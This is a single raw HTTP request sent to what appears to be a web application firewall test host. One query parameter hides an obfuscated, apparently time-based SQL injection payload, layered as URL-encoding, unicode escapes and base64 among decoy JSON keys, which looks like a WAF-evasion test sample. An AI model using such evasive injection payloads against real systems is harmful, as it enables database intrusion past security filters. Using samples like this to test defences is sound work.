GET /impression/registry?stroke=provision&rectify=%5B%0A%22%5Cu006D%5Cu006F%5Cu0064%5Cu0075%5Cu006C%5Cu0065%22%2C%09true%09%2C%0Dtrue%2C%22%5Cu004b%5Cu0053%5Cu006B%5Cu0037%5Cu0056%5Cu0030%5Cu0046%5Cu0070%5Cu0056%5Cu0045%5Cu005a%5Cu0050%5Cu0063%5Cu0067%5Cu0031%5Cu006b%5Cu0052%5Cu0055%5Cu0078%5Cu0068%5Cu0057%5Cu0051%5Cu0041%5Cu0074%5Cu004c%5Cu0053%5Cu0042%5Cu0077%5Cu0062%5Cu0033%5Cu004E%5Cu007a%5Cu0061%5Cu0057%5Cu004a%5Cu0073%5Cu005a%5Cu0057%5Cu0078%5Cu0070%5Cu0064%5Cu0058%5Cu004E%5Cu006c%5Cu0062%5Cu006D%5Cu004e%5Cu0076%5Cu005a%5Cu0047%5Cu006C%5Cu0075%5Cu005A%5Cu0079%5Cu0041%5Cu004B%5Cu004A%5Cu007a%5Cu0041%5Cu0036%5Cu004D%5Cu0044%5Cu006f%5Cu0031%5Cu004A%5Cu0079%5Cu0030%5Cu0074%22%0A%2C%0A%7B%22%5Cu0070%5Cu0065%5Cu0072%5Cu0063%5Cu0065%5Cu006e%5Cu0074%22%3A%0A%0Atrue%20%2C%22%5Cu0061%5Cu006e%5Cu0061%5Cu006C%5Cu0079%5Cu007A%5Cu0065%22%0D%3A%0A%0A%5B%09%0Atrue%2C%22%5Cu006d%5Cu0061%5Cu0067%5Cu006E%5Cu0065%5Cu0074%5Cu0069%5Cu0063%5Cu0020%5Cu0073%5Cu0074%5Cu006F%5Cu0072%5Cu0061%5Cu0067%5Cu0065%22%0D%20%5D%2C%20%20%22%5Cu0064%5Cu0069%5Cu0073%5Cu0070%5Cu0061%5Cu0074%5Cu0063%5Cu0068%5Cu0065%5Cu0072%22%09%3A%201%0D%7D%0D%2C%09%7B%0A%22%5Cu0064%5Cu0065%5Cu0064%5Cu0075%5Cu0063%5Cu0065%22%0A%3A%2098%0A%0A%7D%0A%20%5D HTTP/1.1
Host: waf-ce.chaitin.cn
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; CrOS armv7l 7077.111.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Cookie: robust=at; comprehensive=reconcile; tolerance=square%20brackets; SESSIONID=5da4a462a26b3db7cab8633a96b07fd2ee88b9f4e173c567a4ea8c8ae87909b8295b4470070270e7532f851980747024

